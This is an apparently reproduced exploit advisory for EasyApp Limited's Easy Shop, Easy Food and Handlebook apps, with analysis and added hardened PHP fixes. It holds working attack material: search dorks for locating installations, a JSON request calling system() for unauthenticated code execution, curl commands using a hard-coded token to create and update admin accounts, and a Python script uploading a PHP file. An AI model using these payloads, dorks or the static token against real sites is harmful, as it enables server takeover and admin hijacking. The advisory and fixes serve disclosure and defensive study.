EasyApp Limited Multiple Vulnerabilities: Unauthenticated Arbitrary PHP Function Call and Static Token Bypass

This post reproduces an advisory covering several vulnerabilities in EasyApp Limited products: an unauthenticated arbitrary PHP function call that yields remote code execution (reported by the author as PHP object injection), a hard-coded token that bypasses admin authorization, and unauthenticated arbitrary file upload, deletion and listing. Technical analysis and proof-of-concept (PoC) code are given for each.

Exploit Title: EasyApp Limited - Multiple Vulnerabilities

Date: 2025-06-27

Exploit Author: bRpsd -> cy[at]live.no

Vendor Homepage: https://easyapp.com.hk/

Affected Products: Easy Shop, Easy Food, Handlebook

Affected Versions: v2.5 and below

CVE: N/A

Tested on: localhost xampp, macOS

Dorks (one search term per line):

"Powered By Easyapp © 2025"
Powered By EasyApp Limited inurl:app/web
"Powered By EasyApp Limited"
"DESIGN BY HANDLEBOOK EDUCATION SOLUTIONS © 2025"
"EasyApp Login"
inurl:/web/product_detail.php?linkid=
inurl:app/admin2/login.php
inurl:app/#!/template/newsList.php

##########################################################################################
Vulnerability 1: Unauthenticated arbitrary PHP function call

Reported by the author as "PHP Object Injection, CWE-502: Deserialization of Untrusted Data". No unserialize() is involved, however: json_decode(..., true) returns plain arrays. The handler reads unsanitized JSON from php://input and uses the attacker-supplied "action" string as the name of the function to call, with "data" as its argument (CWE-470: Use of Externally-Controlled Input to Select Classes or Code). Any global PHP function, including system(), is reachable, giving unauthenticated remote code execution (RCE).

File: /app/php/data.php

Relevant code:

$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true) ; 
// call the function named by the client: {"action":"system","data":"whoami"} runs system("whoami")
echo json_encode($json["action"]($json["data"]));

Proof of Concept (PoC), captured request:
POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive
Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"action":"system","data":"whoami"}


Response (system() writes the command output to stdout and returns its last line, which json_encode() then emits again as a JSON string):
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

root
"root"

Using curl:
curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'

"Darwin"
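As an added example that is not part of the advisory or of EasyApp's code, the following PHP shows the data.php dispatcher reduced to its logic beside a hardened replacement that resolves the action through a fixed allowlist. The action names and handler functions in ACTION_MAP are assumed for illustration; the page does not list the application's real actions.

```php
<?php
// Added example, not EasyApp code: the /app/php/data.php dispatcher reduced to its
// logic, and a hardened replacement. ACTION_MAP, handleGetNewsList and
// handleGetProduct are assumed names; the real action list is not on the page.
declare(strict_types=1);

// Vulnerable pattern: the client picks the callable. json_decode(..., true) yields
// plain arrays, so nothing is unserialized; the bug is the dynamic call on an
// attacker-chosen string (CWE-470 / CWE-94), which reaches system(), exec(), ...
function dispatchUnsafe(string $rawBody): string
{
    $json = json_decode($rawBody, true);
    return json_encode($json["action"]($json["data"]));
}

// Hardened: only keys of this map are callable, and the key is compared exactly.
const ACTION_MAP = [
    'getNewsList' => 'handleGetNewsList',
    'getProduct'  => 'handleGetProduct',
];

function handleGetNewsList(array $data): array
{
    return ['news' => [], 'page' => (int)($data['page'] ?? 1)];
}

function handleGetProduct(array $data): array
{
    $id = $data['linkid'] ?? '';
    return ['linkid' => is_scalar($id) ? (string)$id : ''];
}

function dispatchSafe(string $rawBody): string
{
    $json = json_decode($rawBody, true, 16);
    if (!is_array($json) || !isset($json['action']) || !is_string($json['action'])) {
        return json_encode(['status' => 'FAIL', 'error' => 'malformed request']);
    }
    // "system", "exec", "passthru" are simply absent from the map: no callable is
    // ever built from client input.
    if (!array_key_exists($json['action'], ACTION_MAP)) {
        return json_encode(['status' => 'FAIL', 'error' => 'unknown action']);
    }
    $data = $json['data'] ?? [];
    if (!is_array($data)) {
        return json_encode(['status' => 'FAIL', 'error' => 'data must be an object']);
    }
    $handler = ACTION_MAP[$json['action']];
    return json_encode(['status' => 'SUCCESS', 'result' => $handler($data)]);
}

// Demo with constructed bodies; dispatchUnsafe() is deliberately never called.
// In a real handler a session check belongs before dispatchSafe() as well, since
// the advisory's endpoint is reachable without authentication.
$attack = '{"action":"system","data":"whoami"}';   // the advisory's payload
echo dispatchSafe($attack), PHP_EOL;                // rejected as an unknown action
echo dispatchSafe('{"action":"getProduct","data":{"linkid":"42"}}'), PHP_EOL;
echo dispatchSafe('{"action":"getProduct","data":"x"}'), PHP_EOL;   // rejected: data is not an object
echo dispatchSafe('not json'), PHP_EOL;             // rejected as malformed
```

Run it with `php dispatch.php`. The point of the allowlist is that the client never supplies a function name at all; it supplies a key, and the server owns the mapping from key to code, so the class of bug cannot recur when new actions are added.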

##########################################################################################
Vulnerability 2: Static token bypass (CWE-798: Use of Hard-coded Credentials)

File: /app/admin2/php/data.php

Relevant code:

function getAppAccessRight($functionName,$param)
{
    $data = array();
    $data["status"] = "SUCCESS" ; 
    $uid = $_COOKIE["uid"] ; 
    $token = $_COOKIE["token"] ; 
    $escapeFunction = ESCAPE_FUNC_TOKEN ; 
    // echo $functionName . "<br/>";
    // echo $escapeFunction . "<br/>";
    // substring match: exempts any name that occurs anywhere inside the ESCAPE_FUNC_TOKEN list
    if (strpos($escapeFunction, $functionName) !==false)
        return $data ; 
    // static token, identical in every installation
    if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
        return $data ;
    // falls through and returns null: there is no explicit FAIL status
}

This means the authorization check in front of every admin function called through /app/admin2/php/data.php is trivially bypassed: with the hard-coded token we can call createAdmin and updateAdmin, and trigger many other admin-side functions directly. (The PoC Cookie header carries `token` twice; PHP fills $_COOKIE from the first occurrence of a duplicated cookie name, so the hard-coded value is the one compared.)

PoC:
curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "updateAdmin",
    "data": {
      "fullname": "X",
      "loginid": "XXXXXXXXXX",
      "pwd": "XXXXXXXXXX",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'
  
Response:
  {"uid":"UID_HERE","status":"SUCCESS"}


curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "createAdmin",
    "data": {
      "fullname": "X",
      "loginid": "X",
      "pwd": "X",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'
Response:
  {"uid":"UID_HERE","status":"SUCCESS"}
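As an added example that is not part of the advisory or of EasyApp's code, the following PHP isolates the two defects in getAppAccessRight() (the substring match against the exempt-function list, and the static shared token) and shows a fail-closed replacement. The contents of ESCAPE_FUNC_TOKEN and the per-user token store are assumed for illustration; the page shows neither.

```php
<?php
// Added example, not EasyApp code: the two defects in getAppAccessRight() from
// /app/admin2/php/data.php, shown in isolation, and a fail-closed replacement.
// ESCAPE_FUNC_TOKEN's contents and the session store are assumed for illustration.
declare(strict_types=1);

const ESCAPE_FUNC_TOKEN = 'login,getPublicNews,getBanner';   // assumed list of public functions

// Defect 1, as in the original: is the requested name a substring of the list?
// "in" sits inside "login" and "Banner" inside "getBanner", so both are exempted.
function isExemptSubstring(string $functionName): bool
{
    return strpos(ESCAPE_FUNC_TOKEN, $functionName) !== false;
}

// Fix: split the list and compare whole entries with strict in_array().
function isExemptExact(string $functionName): bool
{
    return in_array($functionName, explode(',', ESCAPE_FUNC_TOKEN), true);
}

// Defect 2: one static token shared by every install. Replacement: a random
// per-login token kept server-side, keyed by uid (assumed store; any DB/session works).
function issueToken(array &$store, string $uid): string
{
    $store[$uid] = bin2hex(random_bytes(32));
    return $store[$uid];
}

function getAppAccessRightHardened(string $functionName, array $cookies, array $store): array
{
    if (isExemptExact($functionName)) {
        return ['status' => 'SUCCESS'];
    }
    $uid   = $cookies['uid']   ?? null;
    $token = $cookies['token'] ?? null;
    if (!is_string($uid) || !is_string($token) || !isset($store[$uid])) {
        return ['status' => 'FAIL', 'error' => 'unauthorized'];   // fail closed, never null
    }
    // Constant-time comparison against the token minted for this uid at login.
    if (!hash_equals($store[$uid], $token)) {
        return ['status' => 'FAIL', 'error' => 'unauthorized'];
    }
    return ['status' => 'SUCCESS'];
}

// Demo with constructed data.
var_dump(isExemptSubstring('in'));        // substring check: exempted
var_dump(isExemptSubstring('Banner'));    // substring check: exempted
var_dump(isExemptExact('in'));            // exact check: not an entry
var_dump(isExemptExact('getBanner'));     // exact check: a real entry

$store  = [];
$real   = issueToken($store, '1');
$forged = ['uid' => '1', 'token' => 'abcdefghijklmnopqrstuvwxyz1234567890'];   // the advisory's static token

echo json_encode(getAppAccessRightHardened('updateAdmin', $forged, $store)), PHP_EOL;                          // FAIL
echo json_encode(getAppAccessRightHardened('updateAdmin', ['uid' => '1', 'token' => $real], $store)), PHP_EOL; // SUCCESS
echo json_encode(getAppAccessRightHardened('login', [], $store)), PHP_EOL;                                      // exempt
```

Two design points: the exempt list is consulted by exact entry, so a caller cannot manufacture an exempt name from fragments of real ones, and the token is something the server generated for this login and stored, so there is no secret in the source tree to extract from another installation.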

##########################################################################################
Vulnerability 3: Unauthenticated arbitrary file upload, deletion and disclosure

Path: app/admin2/userimg

Requesting the path directly returns a listing of the files uploaded to /app/admin2/userimg/, each with its URL and a deleteUrl:

Example:
{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}

The same endpoint accepts upload and delete requests directly, without authentication.

Python code to upload a PHP file (x.PhP in the PoC; the author notes that some installations accept .php uploads directly and others do not):
import requests

# Target URL and browser-like headers. No Cookie header is sent: the request is unauthenticated.
url = "https://localhost/app/admin2/userimg/"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br, zstd",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://localhost/",
    "Connection": "keep-alive",
    "Referer": "https://localhost/app/admin2/news-list-add.php",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin"
}

# Form fields the upload handler expects (some setups allow direct PHP upload, some do not)
payload = {
    'attachid': '1',
    'gtitle_zh': '1',
    'linkid': '1'
}

# Multipart file part: client-chosen name, body "test", client-chosen content type
files = {
    'files[]': ('x.PhP', 'test', 'multipart/form-data')
}

response = requests.post(url, headers=headers, data=payload, files=files)

# Print the result
print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)
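As an added example that is not part of the advisory or of EasyApp's code, the following PHP shows server-side validation for an image upload endpoint such as /app/admin2/userimg/ and a safe resolver for the ?file= parameter used by the deleteUrl. The storage directory, the stored-name format and the small PNG used as a valid sample are assumptions; the handler must also require an authenticated admin session before any of this code runs.

```php
<?php
// Added example, not EasyApp code: upload validation for an image endpoint such as
// /app/admin2/userimg/, plus a safe resolver for the ?file= delete parameter.
// Storage directory and name format are assumptions; require an authenticated
// admin session before reaching this code.
declare(strict_types=1);

const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
const MAX_BYTES    = 2 * 1024 * 1024;

// Returns a fresh server-chosen filename, or throws with the rejection reason.
function validateImageUpload(string $clientName, string $tmpPath): string
{
    // Lowercase before comparing, so "x.PhP" from the PoC is seen as "php".
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException("extension not allowed: .$ext");
    }
    clearstatcache(true, $tmpPath);
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    // Content check: the multipart Content-Type is client-controlled; parse the bytes.
    $info = @getimagesize($tmpPath);
    if ($info === false || !in_array($info['mime'], ALLOWED_MIME, true)) {
        throw new RuntimeException('content is not an image');
    }
    // Never store under the client's name; derive the extension from the detected type.
    // Pair this with a web-server rule that does not execute scripts under the upload directory.
    return bin2hex(random_bytes(16)) . '.' . image_type_to_extension($info[2], false);
}

// Deletion: accept only a bare name in the server's own format; no path segments.
function resolveDeleteTarget(string $requested, string $baseDir): string
{
    if ($requested !== basename($requested)
        || !preg_match('/^[0-9a-f]{32}\.(jpe?g|png|gif|webp)$/', $requested)) {
        throw new RuntimeException('invalid file name');
    }
    return $baseDir . DIRECTORY_SEPARATOR . $requested;
}

// Demo with constructed inputs.
$tmp = tempnam(sys_get_temp_dir(), 'up');

file_put_contents($tmp, 'test');                         // the PoC body
foreach (['x.PhP', 'x.png', 'shell.php.jpg'] as $name) {
    try {
        echo validateImageUpload($name, $tmp), PHP_EOL;
    } catch (RuntimeException $e) {
        // x.PhP fails on extension; the other two pass the extension check and fail on content
        echo "$name rejected: {$e->getMessage()}", PHP_EOL;
    }
}

// A 1x1 PNG (constructed inline) passes and is stored under a random name.
file_put_contents($tmp, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));
$stored = validateImageUpload('avatar.PNG', $tmp);
echo $stored, PHP_EOL;
echo resolveDeleteTarget($stored, '/var/www/app/admin2/userimg/files'), PHP_EOL;
try {
    resolveDeleteTarget('../../php/data.php', '/var/www/app/admin2/userimg/files');
} catch (RuntimeException $e) {
    echo "traversal rejected: {$e->getMessage()}", PHP_EOL;
}
unlink($tmp);
```

The three checks are layered on purpose: the extension allowlist handles the case-variant trick, the content check handles a script renamed to an image extension, and regenerating the stored name means nothing the client sent ever becomes part of a path. A polyglot that is both a valid image and PHP source still passes the content check, which is why the comment insists on a no-execute rule for the upload directory.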

Other weaknesses not detailed here:

  1. Access to the admin area [/app/admin2/] is blocked with an HTML/JS redirect rather than a server-side PHP check, so anyone can view the admin dashboard and its HTML source and tamper with it.
  2. Authentication relies on the forgeable HTTP_CLIENT_IP / HTTP_X_FORWARDED_FOR headers, allowing IP address spoofing.
  3. Weak cryptography.
  4. No CSRF, XSS or SQL injection controls.
  5. Sloppy coding, e.g. strpos($escapeFunction, $functionName), which exempts any function name that is a substring of the ESCAPE_FUNC_TOKEN list instead of comparing against exact entries, and "TRUE" misspelled as "TURE" in the 2FA activation.
  6. Reachable test files, e.g. /app/admin2/testFn.php (arbitrary file upload), and other vulnerable endpoints.